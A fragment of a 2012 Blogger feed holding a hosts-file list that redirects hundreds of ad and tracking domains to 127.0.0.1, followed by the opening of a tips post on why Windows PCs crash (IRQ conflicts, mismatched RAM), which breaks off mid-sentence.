iwin.com&lt;br /&gt;127.0.0.1 j.2004cms.com&lt;br /&gt;127.0.0.1 jbeet.cjt1.net&lt;br /&gt;127.0.0.1 jcontent.bns1.net&lt;br /&gt;127.0.0.1 jcount.com&lt;br /&gt;127.0.0.1 jedonkey.cjt1.net&lt;br /&gt;127.0.0.1 jinisearch.co.uk&lt;br /&gt;127.0.0.1 jkazaa.cjt1.net&lt;br /&gt;127.0.0.1 jnova.cjt1.net&lt;br /&gt;127.0.0.1 joetec.net&lt;br /&gt;127.0.0.1 jokedollars.com&lt;br /&gt;127.0.0.1 justwebads.com&lt;br /&gt;127.0.0.1 kanoodle.com&lt;br /&gt;127.0.0.1 kliks.nl&lt;br /&gt;127.0.0.1 klipads.dvlabs.com&lt;br /&gt;127.0.0.1 kliptracker.com&lt;br /&gt;127.0.0.1 klix.cz&lt;br /&gt;127.0.0.1 labeldaily.com&lt;br /&gt;127.0.0.1 laih.com&lt;br /&gt;127.0.0.1 lbn.ru&lt;br /&gt;127.0.0.1 leadingedgecash.com&lt;br /&gt;127.0.0.1 lightningcast.net&lt;br /&gt;127.0.0.1 lightspeedcash.com&lt;br /&gt;127.0.0.1 link4ads.com&lt;br /&gt;127.0.0.1 linkbuddies.com&lt;br /&gt;127.0.0.1 linkexchange.com&lt;br /&gt;127.0.0.1 linkexchange.ru&lt;br /&gt;127.0.0.1 linkprice.com&lt;br /&gt;127.0.0.1 linkreferral.com&lt;br /&gt;127.0.0.1 linksponsor.com&lt;br /&gt;127.0.0.1 linkswaper.com&lt;br /&gt;127.0.0.1 linksynergy.com&lt;br /&gt;127.0.0.1 liquidad.narrowcastmedia.com&lt;br /&gt;127.0.0.1 lnads.osdn.com&lt;br /&gt;127.0.0.1 log.btopenworld.com&lt;br /&gt;127.0.0.1 log.go.com&lt;br /&gt;127.0.0.1 logging.to&lt;br /&gt;127.0.0.1 logs.erasmas.com&lt;br /&gt;127.0.0.1 look2me.com&lt;br /&gt;127.0.0.1 lop.com&lt;br /&gt;127.0.0.1 lstat.susanin.com&lt;br /&gt;127.0.0.1 m.doubleclick.net&lt;br /&gt;127.0.0.1 mads.gamespot.com&lt;br /&gt;127.0.0.1 mainos2.mtv3.fi&lt;br /&gt;127.0.0.1 marketbanker.com&lt;br /&gt;127.0.0.1 marketing.centrebet.com&lt;br /&gt;127.0.0.1 marketing.nyi.com&lt;br /&gt;127.0.0.1 marketing.nyi.net&lt;br /&gt;127.0.0.1 marketscore.com&lt;br /&gt;127.0.0.1 mastermind.com&lt;br /&gt;127.0.0.1 masterstats.com&lt;br /&gt;127.0.0.1 matchcraft.com&lt;br /&gt;127.0.0.1 maximumcash.com&lt;br /&gt;127.0.0.1 maxserving.com&lt;br /&gt;127.0.0.1 mbuyu.nl&lt;br /&gt;127.0.0.1 media-adrunner.mycomputer.com&lt;br /&gt;127.0.0.1 media-motor.net&lt;br /&gt;127.0.0.1 media.bigstep.com&lt;br /&gt;127.0.0.1 media.ftv-publicite.fr&lt;br /&gt;127.0.0.1 mediacharger.com&lt;br /&gt;127.0.0.1 mediadvertising.ro&lt;br /&gt;127.0.0.1 mediageneral.com&lt;br /&gt;127.0.0.1 mediamgr.ugo.com&lt;br /&gt;127.0.0.1 mediaplazza.com&lt;br /&gt;127.0.0.1 mediaplex.com&lt;br /&gt;127.0.0.1 mediascale.de&lt;br /&gt;127.0.0.1 mediavantage.de&lt;br /&gt;127.0.0.1 megacash.de&lt;br /&gt;127.0.0.1 megago.com&lt;br /&gt;127.0.0.1 megawerbung.de&lt;br /&gt;127.0.0.1 memorix.sdv.fr&lt;br /&gt;127.0.0.1 metaad.econet.hu&lt;br /&gt;127.0.0.1 metrics.webcriteria.net&lt;br /&gt;127.0.0.1 microstatic.pl&lt;br /&gt;127.0.0.1 microticker.com&lt;br /&gt;127.0.0.1 mindseti.com&lt;br /&gt;127.0.0.1 mirror.qkimg.net&lt;br /&gt;127.0.0.1 mjxads.internet.com&lt;br /&gt;127.0.0.1 mkt.cz&lt;br /&gt;127.0.0.1 mojobucks.com&lt;br /&gt;127.0.0.1 monsterpops.com&lt;br /&gt;127.0.0.1 mostcash.com&lt;br /&gt;127.0.0.1 ms-links.com&lt;br /&gt;127.0.0.1 msads.net&lt;br /&gt;127.0.0.1 mtree.com&lt;br /&gt;127.0.0.1 multi1.rmuk.co.uk&lt;br /&gt;127.0.0.1 musiccounter.ru&lt;br /&gt;127.0.0.1 myaffiliateprogram.com&lt;br /&gt;127.0.0.1 mystat.pl&lt;br /&gt;127.0.0.1 mytrix.com&lt;br /&gt;127.0.0.1 n69.com&lt;br /&gt;127.0.0.1 naj.sk&lt;br /&gt;127.0.0.1 navrcholu.cz&lt;br /&gt;127.0.0.1 nedstat.com&lt;br /&gt;127.0.0.1 nedstat.nl&lt;br /&gt;127.0.0.1 nedstatbasic.net&lt;br /&gt;127.0.0.1 netads.hotwired.com&lt;br /&gt;127.0.0.1 netads.sohu.com&lt;br /&gt;127.0.0.1 netdirect.nl&lt;br /&gt;127.0.0.1 netpool.netbookia.net&lt;br /&gt;127.0.0.1 netvertising.be&lt;br /&gt;127.0.0.1 network.realmedia.com&lt;br /&gt;127.0.0.1 new-ads.eurogamer.net&lt;br /&gt;127.0.0.1 newads.cmpnet.com&lt;br /&gt;127.0.0.1 newnet.qsrch.com&lt;br /&gt;127.0.0.1 newtopsites.com&lt;br /&gt;127.0.0.1 ng3.ads.warnerbros.com&lt;br /&gt;127.0.0.1 ngadcenter.net&lt;br /&gt;127.0.0.1 nitroclicks.com&lt;br /&gt;127.0.0.1 nsads.hotwired.com&lt;br /&gt;127.0.0.1 ntbanner.digitalriver.com&lt;br /&gt;127.0.0.1 oas-central.realmedia.com&lt;br /&gt;127.0.0.1 oas.benchmark.fr&lt;br /&gt;127.0.0.1 oas.foxnews.com&lt;br /&gt;127.0.0.1 oas.roanoke.com&lt;br /&gt;127.0.0.1 oas.salon.com&lt;br /&gt;127.0.0.1 oas.signonsandiego.com&lt;br /&gt;127.0.0.1 oas.toronto.com&lt;br /&gt;127.0.0.1 oas.uniontrib.com&lt;br /&gt;127.0.0.1 oas.villagevoice.com&lt;br /&gt;127.0.0.1 oascentral.chicagobusiness.com&lt;br /&gt;127.0.0.1 oascentral.redherring.com&lt;br /&gt;127.0.0.1 oascentral.theonion.com&lt;br /&gt;127.0.0.1 oascentral.thesmokinggun.com&lt;br /&gt;127.0.0.1 oasis.promon.cz&lt;br /&gt;127.0.0.1 observer.cz&lt;br /&gt;127.0.0.1 offeroptimizer.com&lt;br /&gt;127.0.0.1 oneandonlynetwork.com&lt;br /&gt;127.0.0.1 onestat.com&lt;br /&gt;127.0.0.1 onresponse.com&lt;br /&gt;127.0.0.1 openad.infobel.com&lt;br /&gt;127.0.0.1 openad.travelnow.com&lt;br /&gt;127.0.0.1 overpeer.com&lt;br /&gt;127.0.0.1 overpro.com&lt;br /&gt;127.0.0.1 overture.com&lt;br /&gt;127.0.0.1 oxcash.com&lt;br /&gt;127.0.0.1 p5.omaha.com&lt;br /&gt;127.0.0.1 partner-ads.com&lt;br /&gt;127.0.0.1 partner-source.com&lt;br /&gt;127.0.0.1 partner.gonamic.de&lt;br /&gt;127.0.0.1 partner.topcities.com&lt;br /&gt;127.0.0.1 partner2profit.com&lt;br /&gt;127.0.0.1 partnerkonto.de&lt;br /&gt;127.0.0.1 partners.priceline.com&lt;br /&gt;127.0.0.1 partners.starnetsystems.net&lt;br /&gt;127.0.0.1 paycounter.com&lt;br /&gt;127.0.0.1 paypopup.com&lt;br /&gt;127.0.0.1 payserve.com&lt;br /&gt;127.0.0.1 pbnet.ru&lt;br /&gt;127.0.0.1 pcwizz.com&lt;br /&gt;127.0.0.1 pennyweb.com&lt;br /&gt;127.0.0.1 phoenix-adrunner.mycomputer.com&lt;br /&gt;127.0.0.1 phpads.i-merge.net&lt;br /&gt;127.0.0.1 pillscash.com&lt;br /&gt;127.0.0.1 pimproll.com&lt;br /&gt;127.0.0.1 planetactive.com&lt;br /&gt;127.0.0.1 play4traffic.com&lt;br /&gt;127.0.0.1 pointroll.com&lt;br /&gt;127.0.0.1 pops.freeze.com&lt;br /&gt;127.0.0.1 popup.msn.com&lt;br /&gt;127.0.0.1 popupad.net&lt;br /&gt;127.0.0.1 popupmoney.com&lt;br /&gt;127.0.0.1 popupnation.com&lt;br /&gt;127.0.0.1 popups.infostart.com&lt;br /&gt;127.0.0.1 popupsponsor.com&lt;br /&gt;127.0.0.1 popuptraffic.com&lt;br /&gt;127.0.0.1 porntrack.com&lt;br /&gt;127.0.0.1 postmasterbannernet.com&lt;br /&gt;127.0.0.1 precisioncounter.com&lt;br /&gt;127.0.0.1 premium-offers.com&lt;br /&gt;127.0.0.1 premiumcash.de&lt;br /&gt;127.0.0.1 primaryads.com&lt;br /&gt;127.0.0.1 primetime.net&lt;br /&gt;127.0.0.1 pro-advertising.com&lt;br /&gt;127.0.0.1 profero.com&lt;br /&gt;127.0.0.1 professorbanner.com&lt;br /&gt;127.0.0.1 promote.pair.com&lt;br /&gt;127.0.0.1 promozia.de&lt;br /&gt;127.0.0.1 provexia.com&lt;br /&gt;127.0.0.1 psstt.com&lt;br /&gt;127.0.0.1 pub-g.ifrance.com&lt;br /&gt;127.0.0.1 pub.club-internet.fr&lt;br /&gt;127.0.0.1 pub.hardware.fr&lt;br /&gt;127.0.0.1 pub.realmedia.fr&lt;br /&gt;127.0.0.1 publi.grupocorreo.es&lt;br /&gt;127.0.0.1 publi1.grupocorreo.es&lt;br /&gt;127.0.0.1 publi2.grupocorreo.es&lt;br /&gt;127.0.0.1 publiads.com&lt;br /&gt;127.0.0.1 publicidad.elmundo.es&lt;br /&gt;127.0.0.1 publicidad.ya.com&lt;br /&gt;127.0.0.1 pubs.branchez-vous.com&lt;br /&gt;127.0.0.1 pubs.lemonde.fr&lt;br /&gt;127.0.0.1 q.azcentral.com&lt;br /&gt;127.0.0.1 qckjmp.com&lt;br /&gt;127.0.0.1 qksrv.net&lt;br /&gt;127.0.0.1 quarterserver.de&lt;br /&gt;127.0.0.1 questaffiliates.net&lt;br /&gt;127.0.0.1 quinst.com&lt;br /&gt;127.0.0.1 r.hotwired.com&lt;br /&gt;127.0.0.1 r.kde.cz&lt;br /&gt;127.0.0.1 rad.msn.com&lt;br /&gt;127.0.0.1 radiate.com&lt;br /&gt;127.0.0.1 rampidads.com&lt;br /&gt;127.0.0.1 ranking-charts.de&lt;br /&gt;127.0.0.1 ranking-hits.de&lt;br /&gt;127.0.0.1 rankyou.com&lt;br /&gt;127.0.0.1 rate.ru&lt;br /&gt;127.0.0.1 rb1.design.ru&lt;br /&gt;127.0.0.1 realads.realmedia.com&lt;br /&gt;127.0.0.1 realclix.com&lt;br /&gt;127.0.0.1 realmedia-a800.d4p.net&lt;br /&gt;127.0.0.1 realtechnetwork.com&lt;br /&gt;127.0.0.1 realtechnetwork.net&lt;br /&gt;127.0.0.1 realtracker.com&lt;br /&gt;127.0.0.1 redsherriff.com&lt;br /&gt;127.0.0.1 referralware.com&lt;br /&gt;127.0.0.1 regnow.com&lt;br /&gt;127.0.0.1 reklam.rfsl.se&lt;br /&gt;127.0.0.1 reklama.internet.cz&lt;br /&gt;127.0.0.1 reklama.reflektor.cz&lt;br /&gt;127.0.0.1 relmaxtop.com&lt;br /&gt;127.0.0.1 remotead.cnet.com&lt;br /&gt;127.0.0.1 reply.mediatris.net&lt;br /&gt;127.0.0.1 retaildirect.realmedia.com&lt;br /&gt;127.0.0.1 revenue.net&lt;br /&gt;127.0.0.1 rewardster.com&lt;br /&gt;127.0.0.1 richmails.com&lt;br /&gt;127.0.0.1 richwebmaster.com&lt;br /&gt;127.0.0.1 rightmedia.net&lt;br /&gt;127.0.0.1 rightstats.com&lt;br /&gt;127.0.0.1 rl.auto.ru&lt;br /&gt;127.0.0.1 rle.ru&lt;br /&gt;127.0.0.1 rmads.msn.com&lt;br /&gt;127.0.0.1 rmedia.boston.com&lt;br /&gt;127.0.0.1 rnd.yxo.ru&lt;br /&gt;127.0.0.1 roar.com&lt;br /&gt;127.0.0.1 roings.com&lt;br /&gt;127.0.0.1 roosevelt.gjbig.com&lt;br /&gt;127.0.0.1 rose.ixbt.com&lt;br /&gt;127.0.0.1 rotabanner.dni.ru&lt;br /&gt;127.0.0.1 rotabanner.izvestia.ru&lt;br /&gt;127.0.0.1 rotabanner.rian.ru&lt;br /&gt;127.0.0.1 rpts.net&lt;br /&gt;127.0.0.1 ru-traffic.com&lt;br /&gt;127.0.0.1 ru4.com&lt;br /&gt;127.0.0.1 safe-audit.com&lt;br /&gt;127.0.0.1 safelists.com&lt;br /&gt;127.0.0.1 sageanalyst.net&lt;br /&gt;127.0.0.1 searchlocate.com&lt;br /&gt;127.0.0.1 searchramp.com&lt;br /&gt;127.0.0.1 secure.webconnect.net&lt;br /&gt;127.0.0.1 seeq.com&lt;br /&gt;127.0.0.1 seo4india.com&lt;br /&gt;127.0.0.1 separtnership.com&lt;br /&gt;127.0.0.1 serv0.com&lt;br /&gt;127.0.0.1 servads.aip.org&lt;br /&gt;127.0.0.1 servedby.netshelter.net&lt;br /&gt;127.0.0.1 servethis.com&lt;br /&gt;127.0.0.1 serving-sys.com&lt;br /&gt;127.0.0.1 sexcounter.com&lt;br /&gt;127.0.0.1 sexlist.com&lt;br /&gt;127.0.0.1 sextracker.com&lt;br /&gt;127.0.0.1 sfads.osdn.com&lt;br /&gt;127.0.0.1 shareasale.com&lt;br /&gt;127.0.0.1 sher.index.hu&lt;br /&gt;127.0.0.1 shinystat.it&lt;br /&gt;127.0.0.1 siccash.com&lt;br /&gt;127.0.0.1 sidebar.angelfire.com&lt;br /&gt;127.0.0.1 sitemeter.com&lt;br /&gt;127.0.0.1 sma.punto.net&lt;br /&gt;127.0.0.1 smartadserver.com&lt;br /&gt;127.0.0.1 smartclicks.net&lt;br /&gt;127.0.0.1 smartdirect.com&lt;br /&gt;127.0.0.1 smfgroup.cjb.net&lt;br /&gt;127.0.0.1 smile.modchipstore.com&lt;br /&gt;127.0.0.1 sn.baventures.com&lt;br /&gt;127.0.0.1 softclick.com.br&lt;br /&gt;127.0.0.1 software.global-netcom.de&lt;br /&gt;127.0.0.1 softwaresponsor.com&lt;br /&gt;127.0.0.1 specificclick.com&lt;br /&gt;127.0.0.1 specificpop.com&lt;br /&gt;127.0.0.1 spezialreporte.de&lt;br /&gt;127.0.0.1 spinbox.maccentral.com&lt;br /&gt;127.0.0.1 spinbox.net&lt;br /&gt;127.0.0.1 spinbox.techtracker.com&lt;br /&gt;127.0.0.1 spinbox.versiontracker.com&lt;br /&gt;127.0.0.1 sponsor4you.net&lt;br /&gt;127.0.0.1 sponsoradulto.com&lt;br /&gt;127.0.0.1 sponsorpro.de&lt;br /&gt;127.0.0.1 sponsors.thoughtsmedia.com&lt;br /&gt;127.0.0.1 sprinks-clicks.about.com&lt;br /&gt;127.0.0.1 spylog.com&lt;br /&gt;127.0.0.1 spywarelabs.com&lt;br /&gt;127.0.0.1 spywarenuker.com&lt;br /&gt;127.0.0.1 ssads.osdn.com&lt;br /&gt;127.0.0.1 starffa.com&lt;br /&gt;127.0.0.1 start.freeze.com&lt;br /&gt;127.0.0.1 stat.dealtime.com&lt;br /&gt;127.0.0.1 stat.doxod.net&lt;br /&gt;127.0.0.1 stat.pl&lt;br /&gt;127.0.0.1 stat.webmedia.pl&lt;br /&gt;127.0.0.1 stat.zenon.net&lt;br /&gt;127.0.0.1 statcounter.com&lt;br /&gt;127.0.0.1 static.itrack.it&lt;br /&gt;127.0.0.1 static.smni.com&lt;br /&gt;127.0.0.1 staticads.btopenworld.com&lt;br /&gt;127.0.0.1 stats.blogger.com&lt;br /&gt;127.0.0.1 stats.cts-bv.nl&lt;br /&gt;127.0.0.1 stats.darkbluesea.com&lt;br /&gt;127.0.0.1 stats.klsoft.com&lt;br /&gt;127.0.0.1 stats4all.com&lt;br /&gt;127.0.0.1 stop-popup-ads-now.com&lt;br /&gt;127.0.0.1 sugoicounter.com&lt;br /&gt;127.0.0.1 superclix.de&lt;br /&gt;127.0.0.1 superstats.com&lt;br /&gt;127.0.0.1 supertop.ru&lt;br /&gt;127.0.0.1 supertop100.com&lt;br /&gt;127.0.0.1 synergiinteractive.com&lt;br /&gt;127.0.0.1 targad.de&lt;br /&gt;127.0.0.1 targetnet.com&lt;br /&gt;127.0.0.1 targetpoint.com&lt;br /&gt;127.0.0.1 targetsaver.com&lt;br /&gt;127.0.0.1 targetshop.com&lt;br /&gt;127.0.0.1 teknosurf2.com&lt;br /&gt;127.0.0.1 teknosurf3.com&lt;br /&gt;127.0.0.1 test.com&lt;br /&gt;127.0.0.1 textads.biz&lt;br /&gt;127.0.0.1 textads.opera.com&lt;br /&gt;127.0.0.1 textlinks.com&lt;br /&gt;127.0.0.1 tfag.de&lt;br /&gt;127.0.0.1 the-counter.net&lt;br /&gt;127.0.0.1 theanswerto.com&lt;br /&gt;127.0.0.1 thebannerguru.com&lt;br /&gt;127.0.0.1 thecounter.com&lt;br /&gt;127.0.0.1 thevictorynetwork.com&lt;br /&gt;127.0.0.1 thinkingmedia.net&lt;br /&gt;127.0.0.1 thisbanner.com&lt;br /&gt;127.0.0.1 thruport.com&lt;br /&gt;127.0.0.1 tier1network.com&lt;br /&gt;127.0.0.1 tinybar.com&lt;br /&gt;127.0.0.1 tmsads.tribune.com&lt;br /&gt;127.0.0.1 toads.osdn.com&lt;br /&gt;127.0.0.1 toolbar.netscape.com&lt;br /&gt;127.0.0.1 top.list.ru&lt;br /&gt;127.0.0.1 top.one.ru&lt;br /&gt;127.0.0.1 top.proext.com&lt;br /&gt;127.0.0.1 top100-images.rambler.ru&lt;br /&gt;127.0.0.1 top100.mafia.ru&lt;br /&gt;127.0.0.1 top20.com&lt;br /&gt;127.0.0.1 topbarh.box.sk&lt;br /&gt;127.0.0.1 toplist.cz&lt;br /&gt;127.0.0.1 toplista.mw.hu&lt;br /&gt;127.0.0.1 topping.com.ua&lt;br /&gt;127.0.0.1 topprofits.info&lt;br /&gt;127.0.0.1 toprebates.com&lt;br /&gt;127.0.0.1 topsearcher.com&lt;br /&gt;127.0.0.1 topshop-counter.rambler.ru&lt;br /&gt;127.0.0.1 topstats.com&lt;br /&gt;127.0.0.1 topstats.net&lt;br /&gt;127.0.0.1 tps108.org&lt;br /&gt;127.0.0.1 track.freexxxhost.net&lt;br /&gt;127.0.0.1 tracking.frantic.com&lt;br /&gt;127.0.0.1 tracking101.com&lt;br /&gt;127.0.0.1 trackmysales.com&lt;br /&gt;127.0.0.1 tradedoubler.com&lt;br /&gt;127.0.0.1 traffic-exchange.com&lt;br /&gt;127.0.0.1 trafficdiscount.com&lt;br /&gt;127.0.0.1 trafficmp.com&lt;br /&gt;127.0.0.1 trafficswarm.com&lt;br /&gt;127.0.0.1 trafficsyndicate.com&lt;br /&gt;127.0.0.1 traffictrader.net&lt;br /&gt;127.0.0.1 trafficvenue.net&lt;br /&gt;127.0.0.1 trafic.ro&lt;br /&gt;127.0.0.1 traficdublu.ro&lt;br /&gt;127.0.0.1 trafix.sk&lt;br /&gt;127.0.0.1 trakkerd.net&lt;br /&gt;127.0.0.1 trekblue.com&lt;br /&gt;127.0.0.1 trekdata.com&lt;br /&gt;127.0.0.1 tribalfusion.com&lt;br /&gt;127.0.0.1 trix.net&lt;br /&gt;127.0.0.1 truehits.net&lt;br /&gt;127.0.0.1 truehits1.gits.net.th&lt;br /&gt;127.0.0.1 truehits2.gits.net.th&lt;br /&gt;127.0.0.1 tsms-ad.tsms.com&lt;br /&gt;127.0.0.1 ukaffiliates2.com&lt;br /&gt;127.0.0.1 ukbanners.com&lt;br /&gt;127.0.0.1 ultimatecounter.com&lt;br /&gt;127.0.0.1 updated.com&lt;br /&gt;127.0.0.1 us.a1.yimg.com&lt;br /&gt;127.0.0.1 usapromotravel.com&lt;br /&gt;127.0.0.1 usmsad.tom.com&lt;br /&gt;127.0.0.1 utarget.co.uk&lt;br /&gt;127.0.0.1 utils.mediageneral.net&lt;br /&gt;127.0.0.1 valuead.com&lt;br /&gt;127.0.0.1 valueclick.com&lt;br /&gt;127.0.0.1 valueclick.net&lt;br /&gt;127.0.0.1 valuecommerce.com&lt;br /&gt;127.0.0.1 valuesponsor.com&lt;br /&gt;127.0.0.1 vendaregroup.com&lt;br /&gt;127.0.0.1 vericlick.com&lt;br /&gt;127.0.0.1 vg.ad.asap-asp.net&lt;br /&gt;127.0.0.1 vibrantmedia.com&lt;br /&gt;127.0.0.1 view4cash.de&lt;br /&gt;127.0.0.1 viewpoint.com&lt;br /&gt;127.0.0.1 vortextraffic.com&lt;br /&gt;127.0.0.1 vx2.cc&lt;br /&gt;127.0.0.1 w3exit.com&lt;br /&gt;127.0.0.1 wannaclick.com&lt;br /&gt;127.0.0.1 web-stat.com&lt;br /&gt;127.0.0.1 web2.deja.com&lt;br /&gt;127.0.0.1 webads.bizservers.com&lt;br /&gt;127.0.0.1 webads.co.nz&lt;br /&gt;127.0.0.1 webads.nl&lt;br /&gt;127.0.0.1 webangel.ru&lt;br /&gt;127.0.0.1 webcash.nl&lt;br /&gt;127.0.0.1 webcounter.cz&lt;br /&gt;127.0.0.1 webcounter.goweb.de&lt;br /&gt;127.0.0.1 webmasterplan.com&lt;br /&gt;127.0.0.1 webpdp.gator.com&lt;br /&gt;127.0.0.1 webpower.com&lt;br /&gt;127.0.0.1 websitefreepromotions.com&lt;br /&gt;127.0.0.1 websponsors.com&lt;br /&gt;127.0.0.1 webstars2000.com&lt;br /&gt;127.0.0.1 webstat.com&lt;br /&gt;127.0.0.1 webstat.net&lt;br /&gt;127.0.0.1 webtraxx.de&lt;br /&gt;127.0.0.1 webtrendslive.com&lt;br /&gt;127.0.0.1 wegcash.com&lt;br /&gt;127.0.0.1 wenksdisdkjeilsow.com&lt;br /&gt;127.0.0.1 whenu.com&lt;br /&gt;127.0.0.1 whispa.com&lt;br /&gt;127.0.0.1 window.nixnet.cz&lt;br /&gt;127.0.0.1 windupdates.com&lt;br /&gt;127.0.0.1 wipub.com&lt;br /&gt;127.0.0.1 worldbe.com&lt;br /&gt;127.0.0.1 wtlive.com&lt;br /&gt;127.0.0.1 wustat.windows.com&lt;br /&gt;127.0.0.1 www-banner.chat.ru&lt;br /&gt;127.0.0.1 www.adsxchange.lv&lt;br /&gt;127.0.0.1 www.banner-link.com.br&lt;br /&gt;127.0.0.1 www.dnps.com&lt;br /&gt;127.0.0.1 www.kaplanindex.com&lt;br /&gt;127.0.0.1 www.money4exit.de&lt;br /&gt;127.0.0.1 www.photo-ads.co.uk&lt;br /&gt;127.0.0.1 www.sponsor2002.de&lt;br /&gt;127.0.0.1 x.mycity.com&lt;br /&gt;127.0.0.1 xchange.ro&lt;br /&gt;127.0.0.1 xiti.com&lt;br /&gt;127.0.0.1 xq1.net&lt;br /&gt;127.0.0.1 xtrocash.org&lt;br /&gt;127.0.0.1 xxxcounter.com&lt;br /&gt;127.0.0.1 xxxtoolbar.com&lt;br /&gt;127.0.0.1 xzoomy.com&lt;br /&gt;127.0.0.1 y.ibsys.com&lt;br /&gt;127.0.0.1 yesadvertising.com&lt;br /&gt;127.0.0.1 youclick2earn.com&lt;br /&gt;127.0.0.1 z.times.lv&lt;br /&gt;127.0.0.1 zanox-affiliate.de&lt;br /&gt;127.0.0.1 zanox.com&lt;br /&gt;127.0.0.1 zeads.com&lt;br /&gt;127.0.0.1 zedo.com&lt;br /&gt;127.0.0.1 zencudo.co.uk&lt;br /&gt;127.0.0.1 zi.r.tv.com&lt;br /&gt;127.0.0.1 zmedia.com&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/8136175797896519476/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=8136175797896519476&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/8136175797896519476?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/8136175797896519476?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/block-adservers-manualy-by-simple-method.html' title='Block Adservers Manualy By Simple Method !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-93NLQMCUGgg/UHxfMAl1PrI/AAAAAAAAAMU/5CstcLCHr-8/s72-c/block-annoying-ads-server.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;DEMDQX05cSp7ImA9WhNTFE0.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-3325980870208322146</id><published>2012-10-16T00:57:00.001+06:00</published><updated>2012-10-16T22:54:30.329+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-16T22:54:30.329+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Windows computer tips'/><category scheme='http://www.blogger.com/atom/ns#' term='PC Tips'/><title>10 reasons why PCs crash U must Know</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Hello visitor,&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-OKp_Im1BSGc/UH2Q9QihXII/AAAAAAAAANE/QbyQGmGcCgA/s1600/pc_crash.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img alt="Pc-Crash" border="0" height="204" src="http://3.bp.blogspot.com/-OKp_Im1BSGc/UH2Q9QihXII/AAAAAAAAANE/QbyQGmGcCgA/s320/pc_crash.png" title="Pc-Crash" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Today i'll Explain 10 reasons why PCs crash U must Know. &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Fatal error:&lt;/span&gt; the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."&lt;br /&gt;&lt;br /&gt;You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;1 Hardware conflict&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.&lt;br /&gt;&lt;br /&gt;For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.&lt;br /&gt;&lt;br /&gt;If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:&lt;br /&gt;&lt;br /&gt;* Start-Settings&amp;gt;Control Panel&amp;gt;System-Device Manager.&lt;br /&gt;&lt;br /&gt;Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.&lt;br /&gt;&lt;br /&gt;Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.&lt;br /&gt;&lt;br /&gt;Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).&lt;br /&gt;&lt;br /&gt;When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.&lt;br /&gt;&lt;br /&gt;To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;2 Bad Ram&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.&lt;br /&gt;&lt;br /&gt;But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.&lt;br /&gt;&lt;br /&gt;One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.&lt;br /&gt;&lt;br /&gt;Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not 